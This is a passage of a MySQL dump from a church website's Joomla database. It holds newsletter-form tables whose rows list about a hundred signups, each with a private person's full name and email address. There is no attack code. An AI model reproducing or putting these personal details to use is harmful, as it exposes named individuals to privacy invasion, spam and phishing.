(15, 'User Notes Category', 'com_users.category', '{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}', '', '{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}', '', '{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_convertforms`
--

CREATE TABLE `y57u5_convertforms` (
  `id` int(10) NOT NULL,
  `name` varchar(80) NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_convertforms`
--

INSERT INTO `y57u5_convertforms` (`id`, `name`, `state`, `created`, `ordering`, `params`) VALUES
(1, 'Lifeoasis church', 1, '2018-07-24 21:56:10', 0, '{\"fields\":{\"fields0\":{\"key\":\"0\",\"type\":\"email\",\"name\":\"email\",\"label\":\"Email Address\",\"description\":\"\",\"required\":\"1\",\"dnscheck\":\"0\",\"size\":\"\",\"value\":\"\",\"placeholder\":\"Enter your email address\",\"hidelabel\":\"0\",\"cssclass\":\"\",\"browserautocomplete\":\"0\"},\"fields1\":{\"key\":\"1\",\"type\":\"text\",\"name\":\"name\",\"label\":\"Name\",\"description\":\"\",\"required\":\"1\",\"size\":\"\",\"value\":\"\",\"placeholder\":\"Enter your name\",\"hidelabel\":\"0\",\"cssclass\":\"\",\"browserautocomplete\":\"0\"},\"fields2\":{\"key\":\"2\",\"type\":\"submit\",\"text\":\"Submit\",\"align\":\"left\",\"btnstyle\":\"flat\",\"fontsize\":\"14\",\"shadow\":\"0\",\"bg\":\"#e86161\",\"textcolor\":\"#ffffff\",\"texthovercolor\":\"#ffffff\",\"borderradius\":\"5\",\"vpadding\":\"11\",\"hpadding\":\"15\",\"size\":\"\",\"cssclass\":\"\"}},\"autowidth\":\"custom\",\"width\":\"500\",\"bgcolor\":\"rgba(255, 255, 255, 1)\",\"bgimage\":\"1\",\"bgurl\":\"\",\"bgfile\":\"\",\"bgrepeat\":\"no-repeat\",\"bgsize\":\"auto\",\"bgposition\":\"left top\",\"text\":\"Welcome to the Dream Centre of the Lifeoasis International Church official website. Signup to receive latest news and information about the ministry.\",\"font\":\"Lato\",\"padding\":\"0\",\"borderradius\":\"0\",\"borderstyle\":\"dashed\",\"bordercolor\":\"#910202\",\"borderwidth\":\"2\",\"image\":\"0\",\"imageurl\":\"\",\"imagefile\":\"\",\"imgposition\":\"img-above\",\"imageautowidth\":\"auto\",\"imagewidth\":\"200\",\"imagesize\":\"6\",\"imagehposition\":\"0\",\"imagevposition\":\"0\",\"imagealt\":\"\",\"hideimageonmobile\":\"0\",\"formposition\":\"form-bottom\",\"formsize\":\"16\",\"formbgcolor\":\"rgba(240, 231, 231, 1)\",\"labelscolor\":\"#888888\",\"labelsfontsize\":\"14\",\"required_indication\":\"0\",\"inputfontsize\":\"13\",\"inputcolor\":\"#888888\",\"inputbg\":\"#ffffff\",\"inputalign\":\"left\",\"inputbordercolor\":\"#cccccc\",\"inputborderradius\":\"5\",\"inputvpadding\":\"11\",\"inputhpadding\":\"13\",\"inputshadow\":\"0\",\"footer\":\"\",\"customcss\":\"\",\"customcode\":\"\",\"classsuffix\":\"\",\"sendnotifications\":\"1\",\"emails\":{\"emails0\":{\"recipient\":\"lifeoasischurch@gmail.com\",\"subject\":\"Newsletter Signup\",\"from_name\":\"Rev. Olusola Ayodele Areogun\",\"from_email\":\"lifeoasischurch@gmail.com\",\"reply_to\":\"lifeoasischurch@gmail.com\",\"body\":\"{all_fields}\"}},\"campaign\":\"1\",\"onsuccess\":\"msg\",\"successmsg\":\"Thank you\",\"resetform\":\"1\",\"hideform\":\"1\",\"hidetext\":\"0\"}');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_convertforms_campaigns`
--

CREATE TABLE `y57u5_convertforms_campaigns` (
  `id` int(10) NOT NULL,
  `name` varchar(100) NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `service` varchar(50) NOT NULL,
  `params` text
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_convertforms_campaigns`
--

INSERT INTO `y57u5_convertforms_campaigns` (`id`, `name`, `state`, `created`, `ordering`, `service`, `params`) VALUES
(1, 'Demo Campaign', 1, '0000-00-00 00:00:00', 0, '0', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_convertforms_conversions`
--

CREATE TABLE `y57u5_convertforms_conversions` (
  `id` int(10) NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `campaign_id` int(10) NOT NULL,
  `form_id` int(11) NOT NULL,
  `visitor_id` varchar(64) DEFAULT NULL,
  `user_id` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `state` tinyint(3) NOT NULL DEFAULT '1'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_convertforms_conversions`
--

INSERT INTO `y57u5_convertforms_conversions` (`id`, `created`, `modified`, `campaign_id`, `form_id`, `visitor_id`, `user_id`, `params`, `state`) VALUES
(1, '2018-07-24 22:05:30', '0000-00-00 00:00:00', 1, 1, '93f30eaefda9d8c4', 0, '{\"email\":\"banjiadewoye@gmail.com\",\"name\":\"Adewoye Seun Oyebanji\"}', 1),
(2, '2018-07-24 22:19:06', '0000-00-00 00:00:00', 1, 1, '93f30eaefda9d8c4', 0, '{\"email\":\"banjiadewoye@gmail.com\",\"name\":\"seun\"}', 1),
(3, '2018-07-24 22:20:36', '0000-00-00 00:00:00', 1, 1, '93f30eaefda9d8c4', 0, '{\"email\":\"banjiadewoye@gmail.com\",\"name\":\"Adewoye Seun Oyebanji\"}', 1),
(4, '2018-07-25 04:59:13', '0000-00-00 00:00:00', 1, 1, '381aa1d8da306be0', 0, '{\"email\":\"oluabifunke@yahoo.com\",\"name\":\"PHEBE OLUFUNKE ABIOYE (MRS.) \"}', 1),
(5, '2018-07-25 16:03:02', '0000-00-00 00:00:00', 1, 1, 'e2263e5a68a02511', 0, '{\"email\":\"adeolasaba@gmail.com\",\"name\":\"Adeola Saba\"}', 1),
(6, '2018-07-25 16:06:42', '0000-00-00 00:00:00', 1, 1, 'a38ede7face19e33', 0, '{\"email\":\"opeyemi.ifsa@gmail.com\",\"name\":\"Opeyemi Adeyemi\"}', 1),
(7, '2018-07-25 16:13:32', '0000-00-00 00:00:00', 1, 1, 'f19010d8a5f137d0', 0, '{\"email\":\"zabdah@yahoo.com\",\"name\":\"Zakariyau DAHOUD\"}', 1),
(8, '2018-07-25 16:15:08', '0000-00-00 00:00:00', 1, 1, '8cf1f4b8bd4cc593', 0, '{\"email\":\"pettersonlaw@gmail.com\",\"name\":\"Lawrence Sadare\"}', 1),
(9, '2018-07-25 16:16:51', '0000-00-00 00:00:00', 1, 1, '9ed85e6813f67863', 0, '{\"email\":\"Ijatoyetoyosi1@gmail.com\",\"name\":\"Ijatoye Toyosi\"}', 1),
(10, '2018-07-25 16:17:24', '0000-00-00 00:00:00', 1, 1, 'f222476c14ff81dd', 0, '{\"email\":\"adedeji.seun@gmail.com\",\"name\":\"Oluwaseun Adedeji\"}', 1),
(11, '2018-07-25 16:32:02', '0000-00-00 00:00:00', 1, 1, '8fe01adad9365e73', 0, '{\"email\":\"akinyeleolat2005@gmail.com\",\"name\":\"Akinyele Oluwatosin A\"}', 1),
(12, '2018-07-25 16:33:11', '0000-00-00 00:00:00', 1, 1, '417b807dff7c6249', 0, '{\"email\":\"segunezek@gmail.com\",\"name\":\"Segun Oyebamiji\"}', 1),
(13, '2018-07-25 17:04:48', '0000-00-00 00:00:00', 1, 1, '75bb8699f854b67c', 0, '{\"email\":\"oakinsefunmi@gmail.com\",\"name\":\"Akin Olaloye\"}', 1),
(14, '2018-07-25 17:11:39', '0000-00-00 00:00:00', 1, 1, '43413ce9521001de', 0, '{\"email\":\"bodeabiola@gmail.com\",\"name\":\"Olabode Abiola \"}', 1),
(15, '2018-07-25 17:25:02', '0000-00-00 00:00:00', 1, 1, 'da82b7e8c7966d73', 0, '{\"email\":\"tomisinolatoye@gmail.com\",\"name\":\"Oluwatomisin Olatoye\"}', 1),
(16, '2018-07-25 17:38:48', '0000-00-00 00:00:00', 1, 1, 'cedfede1dd4805e0', 0, '{\"email\":\"lola_dere2@yahoo.com\",\"name\":\"Omolola Adewumi-ajayi\"}', 1),
(17, '2018-07-26 04:08:57', '0000-00-00 00:00:00', 1, 1, '9a903552e28cf43c', 0, '{\"email\":\"omololaonamusi@gmail.com\",\"name\":\"Omolola Okeowo \"}', 1),
(18, '2018-07-27 05:26:25', '0000-00-00 00:00:00', 1, 1, '290de4fb13f4dbee', 0, '{\"email\":\"obasanjo87@gmail\",\"name\":\"Obasanjo\"}', 1),
(19, '2018-07-27 05:36:55', '0000-00-00 00:00:00', 1, 1, '290de4fb13f4dbee', 0, '{\"email\":\"obasanjo87@gmail\",\"name\":\"Obasanjo\"}', 1),
(20, '2018-07-28 19:00:40', '0000-00-00 00:00:00', 1, 1, 'e38fbc76ae580892', 0, '{\"email\":\"bankyfolarin@gmail.com\",\"name\":\"Bankole Akinfolarin\"}', 1),
(21, '2018-07-29 05:54:26', '0000-00-00 00:00:00', 1, 1, '3f73af925c2fb320', 0, '{\"email\":\"seun_adetoro@yahoo.com\",\"name\":\"Adetoro Seun Olaoye \"}', 1),
(22, '2018-07-29 07:02:43', '0000-00-00 00:00:00', 1, 1, 'ba32395289361d31', 0, '{\"email\":\"godspoem1@gmail.com\",\"name\":\"Oluwabunmi Adeyemo\"}', 1),
(23, '2018-07-29 07:48:11', '0000-00-00 00:00:00', 1, 1, '56e277fde1dd496f', 0, '{\"email\":\"blessingiguma63@gmail.com\",\"name\":\"elodie\"}', 1),
(24, '2018-07-29 08:26:55', '0000-00-00 00:00:00', 1, 1, '99ddf52c8ba9b467', 0, '{\"email\":\"mola0505@yahoo.com\",\"name\":\"Muyiwa\"}', 1),
(25, '2018-07-29 08:44:09', '0000-00-00 00:00:00', 1, 1, '3f73af925c2fb320', 0, '{\"email\":\"seun_adetoro@yahoo.com\",\"name\":\"Adetoro Seun Olaoye \"}', 1),
(26, '2018-07-29 09:19:53', '0000-00-00 00:00:00', 1, 1, 'f5ea342846f5c547', 0, '{\"email\":\"ajialaafia@gmail.com\",\"name\":\"Alaafia Ajibade\"}', 1),
(27, '2018-07-29 09:48:56', '0000-00-00 00:00:00', 1, 1, '074ec8007ba74449', 0, '{\"email\":\"bis25mat@gmail.com\",\"name\":\"Adeniji O. Israel\"}', 1),
(28, '2018-07-29 10:13:21', '0000-00-00 00:00:00', 1, 1, '0c9bfe786f45cacc', 0, '{\"email\":\"emmanuelgreatonline@gmail.com\",\"name\":\"Emmanuel Great\"}', 1),
(29, '2018-07-29 16:32:28', '0000-00-00 00:00:00', 1, 1, '6870839242ab9043', 0, '{\"email\":\"joyreallove@yahoo.com\",\"name\":\"Joy\"}', 1),
(30, '2018-07-29 18:30:07', '0000-00-00 00:00:00', 1, 1, '443992762b323eef', 0, '{\"email\":\"adebisiabimbola16@gmail.com\",\"name\":\"Adebisi Abimbola\"}', 1),
(31, '2018-07-29 18:31:42', '0000-00-00 00:00:00', 1, 1, '443992762b323eef', 0, '{\"email\":\"adebisiabimbola16@gmail.com\",\"name\":\"Adebisi Abimbola\"}', 1),
(32, '2018-07-29 18:33:26', '0000-00-00 00:00:00', 1, 1, '443992762b323eef', 0, '{\"email\":\"adebisiabimbola16@gmail.com\",\"name\":\"Adebisi Abimbola\"}', 1),
(33, '2018-07-30 05:40:16', '0000-00-00 00:00:00', 1, 1, 'be6acdfed1a57fd0', 0, '{\"email\":\"kingisaac11@gmail.com\",\"name\":\"Isaac\"}', 1),
(34, '2018-07-30 15:43:09', '0000-00-00 00:00:00', 1, 1, 'f09fb0829a240068', 0, '{\"email\":\"adelekeomowonuola@gmail.com\",\"name\":\"Adeleke Omowonuola\"}', 1),
(35, '2018-08-01 17:20:48', '0000-00-00 00:00:00', 1, 1, 'b65ffd784dfa7fc5', 0, '{\"email\":\"nikeldz@gmail.com\",\"name\":\"Favour Emmanuel\"}', 1),
(36, '2018-08-01 17:58:51', '0000-00-00 00:00:00', 1, 1, 'a1cab04f2152cc2b', 0, '{\"email\":\"atopeaceland@gmail.com\",\"name\":\"Tope Adewuya\"}', 1),
(37, '2018-08-02 05:02:47', '0000-00-00 00:00:00', 1, 1, '05d8706c6b789351', 0, '{\"email\":\"olusolaolaoseeji@gmail.com\",\"name\":\"Olusola Olaoseeji\"}', 1),
(38, '2018-08-02 10:07:46', '0000-00-00 00:00:00', 1, 1, '23a8fd0ecc0a9981', 0, '{\"email\":\"iyamemonday@gmail.com\",\"name\":\"John Monday\"}', 1),
(39, '2018-08-02 14:38:42', '0000-00-00 00:00:00', 1, 1, '53429be60ad0865e', 0, '{\"email\":\"chrisokoh14@gmail.com\",\"name\":\"christian Okoh\"}', 1),
(40, '2018-08-03 02:48:00', '0000-00-00 00:00:00', 1, 1, '5e01d68716e56e73', 0, '{\"email\":\"olaoluoniya@gmail.com\",\"name\":\"OlaOluwa Oniya\"}', 1),
(41, '2018-08-03 19:54:37', '0000-00-00 00:00:00', 1, 1, 'e9da8d1361ce3898', 0, '{\"email\":\"samuelolalere2016@outlook.com\",\"name\":\"Samuel olalere \"}', 1),
(42, '2018-08-03 21:40:21', '0000-00-00 00:00:00', 1, 1, '1e89e79b2af57349', 0, '{\"email\":\"docvicadebayo@gmail.com\",\"name\":\"Victor Adebayo\"}', 1),
(43, '2018-08-04 07:11:09', '0000-00-00 00:00:00', 1, 1, '0e085a8b5974b6b1', 0, '{\"email\":\"homamenum@yahoo.com\",\"name\":\"Allison Homa\"}', 1),
(44, '2018-08-04 09:04:19', '0000-00-00 00:00:00', 1, 1, '407fc00e93fa6f77', 0, '{\"email\":\"dimeji.segun@yahoo.com\",\"name\":\"Folarin Oluwasegun \"}', 1),
(45, '2018-08-04 15:09:39', '0000-00-00 00:00:00', 1, 1, '76d870a9d182ecfb', 0, '{\"email\":\"adesoladorcas2@gmail.com\",\"name\":\"Simileoluwa Dorcas\"}', 1),
(46, '2018-08-05 05:53:43', '0000-00-00 00:00:00', 1, 1, 'af7ae4ae32e8318b', 0, '{\"email\":\"adejerrydasz@gmail.com\",\"name\":\"Samuel Dada\"}', 1),
(47, '2018-08-05 06:05:13', '0000-00-00 00:00:00', 1, 1, '65e6907002f96896', 0, '{\"email\":\"olasindetony@gmail.com\",\"name\":\"Anthony Olasinde\"}', 1),
(48, '2018-08-05 07:21:19', '0000-00-00 00:00:00', 1, 1, '6f1d980f2e600de6', 0, '{\"email\":\"Tolulopedeborah4@gmail.com\",\"name\":\"Adetunbi Toluwalope\"}', 1),
(49, '2018-08-05 07:48:24', '0000-00-00 00:00:00', 1, 1, 'cedfede1dd4805e0', 0, '{\"email\":\"temi.wumi@gmail.com\",\"name\":\"Omolola Adewumi-ajayi\"}', 1),
(50, '2018-08-05 07:58:08', '0000-00-00 00:00:00', 1, 1, 'd3bc330683c263f4', 0, '{\"email\":\"opadotun01@gmail.com\",\"name\":\"OPADOTUN AKINOLA JOSEPH\"}', 1),
(51, '2018-08-05 13:29:17', '0000-00-00 00:00:00', 1, 1, '4bd39ff593d97ee7', 0, '{\"email\":\"oyewolesemiloore@gmail.com\",\"name\":\"Semiloore\"}', 1),
(52, '2018-08-05 17:33:33', '0000-00-00 00:00:00', 1, 1, '29a676964dd6c7a1', 0, '{\"email\":\"ptaiwoakanni@yahoo.com\",\"name\":\"Akanni Peter\"}', 1),
(53, '2018-08-06 05:00:00', '0000-00-00 00:00:00', 1, 1, 'ae172d1e3fca2594', 0, '{\"email\":\"kgnesta@gmail.com\",\"name\":\"Gbenga Komolafe\"}', 1),
(54, '2018-08-06 13:30:12', '0000-00-00 00:00:00', 1, 1, 'ea5913d75f7b57ae', 0, '{\"email\":\"Olatunjisamson2010@gmail.com\",\"name\":\"Samson Olatunji \"}', 1),
(55, '2018-08-07 10:05:47', '0000-00-00 00:00:00', 1, 1, '7e02bbf4d4e92987', 0, '{\"email\":\"seunolomofe@gmail.com\",\"name\":\"Oluwaseun Olomofe \"}', 1),
(56, '2018-08-07 13:13:06', '0000-00-00 00:00:00', 1, 1, '4305f43ed91c1923', 0, '{\"email\":\"lanreolaniyan@hotmail.co.uk\",\"name\":\"Lanre Olaniyan\"}', 1),
(57, '2018-08-07 21:59:36', '0000-00-00 00:00:00', 1, 1, '39a7f7cf080971cf', 0, '{\"email\":\"segunoyewole40@gmail.com\",\"name\":\"Evang.Oyewole\"}', 1),
(58, '2018-08-08 12:17:06', '0000-00-00 00:00:00', 1, 1, 'd61c2b98ce2b21b9', 0, '{\"email\":\"akinwandegboluwaga@yahoo.com\",\"name\":\"Gboluwaga Akinwande\"}', 1),
(59, '2018-08-08 17:59:24', '0000-00-00 00:00:00', 1, 1, 'd78530b661d047b1', 0, '{\"email\":\"dennisontour2000@gmail.com\",\"name\":\"Oluwaseun \"}', 1),
(60, '2018-08-09 06:59:19', '0000-00-00 00:00:00', 1, 1, 'a86d0aa20820f4cb', 0, '{\"email\":\"eniafelamo2002@yahoo.com\",\"name\":\"Adeleye Babatunde Kayode \"}', 1),
(61, '2018-08-09 18:37:03', '0000-00-00 00:00:00', 1, 1, 'e58ad7d9cbebeee8', 0, '{\"email\":\"oluwatofunmi.obaseki@gmail.com\",\"name\":\"Oluwatofunmi\"}', 1),
(62, '2018-08-09 19:43:04', '0000-00-00 00:00:00', 1, 1, 'd502832b2d622e7b', 0, '{\"email\":\"Akinyosoyeclement@yahoo.com\",\"name\":\"Clement\"}', 1),
(63, '2018-08-09 19:44:32', '0000-00-00 00:00:00', 1, 1, 'd502832b2d622e7b', 0, '{\"email\":\"Akpompy4real@yahoo.com\",\"name\":\"Emmanuel\"}', 1),
(64, '2018-08-10 07:14:35', '0000-00-00 00:00:00', 1, 1, 'fbc9d7ace3bb8e8f', 0, '{\"email\":\"olamideadekanola@gmail.com\",\"name\":\"Olamide Adekanola \"}', 1),
(65, '2018-08-10 11:10:56', '0000-00-00 00:00:00', 1, 1, 'f2871991019a58d6', 0, '{\"email\":\"tutucoker@hotmail.com\",\"name\":\"Adetutu Coker\"}', 1),
(66, '2018-08-10 12:33:25', '0000-00-00 00:00:00', 1, 1, '4935613367869918', 0, '{\"email\":\"folashadekehinde.oni@gmail.com\",\"name\":\"Folasde kehinde oni\"}', 1),
(67, '2018-08-10 13:10:51', '0000-00-00 00:00:00', 1, 1, '9ffcca18999658c8', 0, '{\"email\":\"adex1177@gmail.com\",\"name\":\"Adegboyega Ogunole\"}', 1),
(68, '2018-08-10 18:25:43', '0000-00-00 00:00:00', 1, 1, '4dd25f398f19d3bf', 0, '{\"email\":\"babatojo@yahoo.com\",\"name\":\"Tunde Ojo \"}', 1),
(69, '2018-08-11 08:14:46', '0000-00-00 00:00:00', 1, 1, '0144854c6879ab11', 0, '{\"email\":\"koladetayo19@yahoo.com\",\"name\":\"Kolade C. Temitayo\"}', 1),
(70, '2018-08-11 10:22:59', '0000-00-00 00:00:00', 1, 1, '9581c11a1f3ea8ef', 0, '{\"email\":\"eligbenga2016@gmail.com\",\"name\":\"Gbenga Elijah Akinyemi \"}', 1),
(71, '2018-08-12 08:28:06', '0000-00-00 00:00:00', 1, 1, 'a72ff1c3d7e205d6', 0, '{\"email\":\"launchforth@yahoo.com\",\"name\":\"Lanre Awoyemi\"}', 1),
(72, '2018-08-12 08:37:48', '0000-00-00 00:00:00', 1, 1, '2622b37d94f09b78', 0, '{\"email\":\"ojo.adebayo.oluwaseun@gmail.com\",\"name\":\"Ojo Adebayo\"}', 1),
(73, '2018-08-12 11:03:08', '0000-00-00 00:00:00', 1, 1, 'b79c17f82da5452a', 0, '{\"email\":\"olikings4sure2@gmail.com\",\"name\":\"Umeh innocent\"}', 1),
(74, '2018-08-12 11:08:39', '0000-00-00 00:00:00', 1, 1, '358c53677e540790', 0, '{\"email\":\"oyemayokun1z@gmail.com\",\"name\":\"OYELARAN oyerinde sanjo\"}', 1),
(75, '2018-08-12 11:09:03', '0000-00-00 00:00:00', 1, 1, 'b79c17f82da5452a', 0, '{\"email\":\"olikings4sure2@gmail.com\",\"name\":\"Umeh innocent\"}', 1),
(76, '2018-08-12 11:11:52', '0000-00-00 00:00:00', 1, 1, 'b79c17f82da5452a', 0, '{\"email\":\"olikings4sure2@gmail.com\",\"name\":\"Umeh innocent\"}', 1),
(77, '2018-08-12 16:03:31', '0000-00-00 00:00:00', 1, 1, 'ef550b0a322680e1', 0, '{\"email\":\"adex1177@gmail.com\",\"name\":\"Ade\"}', 1),
(78, '2018-08-14 07:22:39', '0000-00-00 00:00:00', 1, 1, '2e376363d6528853', 0, '{\"email\":\"aikayo1999@gmail.com\",\"name\":\"AYODEJI IYIOLA ESAN\"}', 1),
(79, '2018-08-14 09:47:17', '0000-00-00 00:00:00', 1, 1, '1156cc5606e72ec0', 0, '{\"email\":\"bisolaremiadeniji@gmail.com\",\"name\":\"Bisola Adeniji\"}', 1),
(80, '2018-08-14 19:44:32', '0000-00-00 00:00:00', 1, 1, '87145fb64333da12', 0, '{\"email\":\"LATUNJI247@GMAIL.COM\",\"name\":\"OLATUNJI KAYODE\"}', 1),
(81, '2018-08-15 18:07:44', '0000-00-00 00:00:00', 1, 1, '03c4bb20aee35949', 0, '{\"email\":\"jeremiahbamirola@gmail.com\",\"name\":\"Eniola Jeremiah Bamirola\"}', 1),
(82, '2018-08-15 19:50:03', '0000-00-00 00:00:00', 1, 1, '413c3a89b7e3094e', 0, '{\"email\":\"tonychux@gmail.com\",\"name\":\"Sir Anthony \"}', 1),
(83, '2018-08-16 16:46:25', '0000-00-00 00:00:00', 1, 1, '61bdf79be72ab0e7', 0, '{\"email\":\"ruth.xabendlini@gmail.com\",\"name\":\"Ruth\"}', 1),
(84, '2018-08-17 10:52:23', '0000-00-00 00:00:00', 1, 1, '23001390741c5cc2', 0, '{\"email\":\"cletusdeunifier@gmail.com\",\"name\":\"Cletus\"}', 1),
(85, '2018-08-17 10:52:27', '0000-00-00 00:00:00', 1, 1, '23001390741c5cc2', 0, '{\"email\":\"cletusdeunifier@gmail.com\",\"name\":\"Cletus\"}', 1),
(86, '2018-08-18 15:47:14', '0000-00-00 00:00:00', 1, 1, '542e8420b0059f1d', 0, '{\"email\":\"adejohojochoko@gmail.com\",\"name\":\"08030557128oa\"}', 1),
(87, '2018-08-18 15:48:24', '0000-00-00 00:00:00', 1, 1, '542e8420b0059f1d', 0, '{\"email\":\"adejohojochoko@gmail.com\",\"name\":\"08030557128oa\"}', 1),
(88, '2018-08-18 15:52:15', '0000-00-00 00:00:00', 1, 1, '542e8420b0059f1d', 0, '{\"email\":\"adejohojochoko@gmail.com\",\"name\":\"Adejoh ojochoko \"}', 1),
(89, '2018-08-18 15:52:52', '0000-00-00 00:00:00', 1, 1, '542e8420b0059f1d', 0, '{\"email\":\"adejohojochoko@gmail.com\",\"name\":\"Adejoh ojochoko \"}', 1),
(90, '2018-08-18 15:53:40', '0000-00-00 00:00:00', 1, 1, '542e8420b0059f1d', 0, '{\"email\":\"adejohojochoko@gmail.com\",\"name\":\"Adejoh ojochoko \"}', 1),
(91, '2018-08-18 15:55:26', '0000-00-00 00:00:00', 1, 1, '542e8420b0059f1d', 0, '{\"email\":\"adejohojochoko@gmail.com\",\"name\":\"Adejoh ojochoko \"}', 1),
(92, '2018-08-18 15:55:43', '0000-00-00 00:00:00', 1, 1, '0da5049b9afac708', 0, '{\"email\":\"faithfulness414@gmail.com\",\"name\":\"Emmanuel olabode\"}', 1),
(93, '2018-08-18 18:10:39', '0000-00-00 00:00:00', 1, 1, '7f4dcfac0fa2ceb3', 0, '{\"email\":\"ruthjoy.904@gmail.com\",\"name\":\"Ruth Joy\"}', 1),
(94, '2018-08-18 18:54:49', '0000-00-00 00:00:00', 1, 1, '3dc923097d25f24e', 0, '{\"email\":\"ronkealabi6@gmail.com\",\"name\":\"Ronke Alabi \"}', 1),
(95, '2018-08-18 19:20:17', '0000-00-00 00:00:00', 1, 1, '56e277fde1dd496f', 0, '{\"email\":\"blessingiguma63@gmail.com\",\"name\":\"elodie2317\"}', 1),
(96, '2018-08-18 19:22:04', '0000-00-00 00:00:00', 1, 1, '56e277fde1dd496f', 0, '{\"email\":\"blessingiguma63@gmail.com\",\"name\":\"elodie2317\"}', 1),
(97, '2018-08-18 21:00:46', '0000-00-00 00:00:00', 1, 1, '4a78e4b9f3c4c167', 0, '{\"email\":\"oyerindedorcas@yahoo.com\",\"name\":\"Dr. Adetula, Dorcas \"}', 1),
(98, '2018-08-19 07:32:20', '0000-00-00 00:00:00', 1, 1, 'a563f0e96a08ad35', 0, '{\"email\":\"ajayi.adebisi@gmail.com\",\"name\":\"Ajayi Adebisi\"}', 1),
(99, '2018-08-19 09:40:54', '0000-00-00 00:00:00', 1, 1, 'a4d896a6fb2e7ba8', 0, '{\"email\":\"adesiyanbolaisaac@gmail.com\",\"name\":\"Adeshiyan Isaac Opeyemi \"}', 1),
(100, '2018-08-19 09:54:01', '0000-00-00 00:00:00', 1, 1, 'd1020496d6336d0a', 0, '{\"email\":\"robson_pastor@yahoo.com\",\"name\":\"Robson Sam Abraham \"}', 1),
(101, '2018-08-20 07:48:00', '0000-00-00 00:00:00', 1, 1, '237ff72d4ccb4f1e', 0, '{\"email\":\"sadesuyi@gmail.com\",\"name\":\"Shalom Oluyinka Adesuyi\"}', 1),
(102, '2018-08-20 17:31:52', '0000-00-00 00:00:00', 1, 1, '7e2132947460f3c3', 0, '{\"email\":\"dosglobalhealthcity@gmail.com\",\"name\":\"Olushola Durojaiye \"}', 1),
(103, '2018-08-20 17:34:08', '0000-00-00 00:00:00', 1, 1, '7e2132947460f3c3', 0, '{\"email\":\"durojaiyeolusholasamson@gmail.com\",\"name\":\"Durojaiye olushola samson\"}', 1),
(104, '2018-08-20 17:35:19', '0000-00-00 00:00:00', 1, 1, '7e2132947460f3c3', 0, '{\"email\":\"avensloan@gmail.com\",\"name\":\"Samson Durojaiye \"}', 1),
(105, '2018-08-20 19:54:44', '0000-00-00 00:00:00', 1, 1, 'a436627166f3f559', 0, '{\"email\":\"kehindeolawalecole@gmail.com\",\"name\":\"Olakunle\"}', 1),
(106, '2018-08-21 02:07:38', '0000-00-00 00:00:00', 1, 1, 'c985e3a6db88f804', 0, '{\"email\":\"aminujerome@gmail.com\",\"name\":\"Tobi Aminu\"}', 1),
(107, '2018-08-21 11:06:26', '0000-00-00 00:00:00', 1, 1, 'c850ddd512532e36', 0, '{\"email\":\"therevealerofall@gmail.com\",\"name\":\"Olaogun Victoria Oluwabusayo\"}', 1),
(108, '2018-08-22 00:00:01', '0000-00-00 00:00:00', 1, 1, 'f230958316b19351', 0, '{\"email\":\"tosinfayiga@gmail.com\",\"name\":\"Michael Fayiga\"}', 1),
(109, '2018-08-22 12:15:14', '0000-00-00 00:00:00', 1, 1, 'f15b0414cfeadf7b', 0, '{\"email\":\"segjamoy@gmail.com\",\"name\":\"Olusegun  Oyeyemi\"}', 1),
(110, '2018-08-22 12:17:00', '0000-00-00 00:00:00', 1, 1, '8d1ff303fbdd00de', 0, '{\"email\":\"akinkunmiakinleye@gmail.com\",\"name\":\"Akinkunmi Akinleye\"}', 1),
(111, '2018-08-23 06:50:16', '0000-00-00 00:00:00', 1, 1, 'f19010d8a5f137d0', 0, '{\"email\":\"ddeyoadewale@hotmail.com\",\"name\":\"Abigail DAHOUD\"}', 1),
